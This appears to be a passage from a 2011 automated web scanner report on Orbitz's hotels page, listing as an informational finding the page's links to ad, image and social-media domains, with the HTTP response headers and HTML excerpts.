                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>


            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<div class="ad americanExpress"><a href="http://www.revresda.com/click.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...

<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<noscript> <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

17.364. http://www.orbitz.com/hotels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/hotels/?z=4fae&r=1o

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif
http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif
http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchForm/telesales/ORB_Telesales_HotelSearchBot-1.png
http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png
http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png
http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css
http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js
http://www.tnetnoc.com/static/27.4.7/style/global/printAll.css
http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101
https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; Path=/
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; Expires=Mon, 27-Jan-2031 15:23:12 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Feb 2011 15:23:12 GMT
Set-Cookie: NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9;path=/
Content-Length: 107727

...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotels/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/style/global/printAll.css" media="print">
               
       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
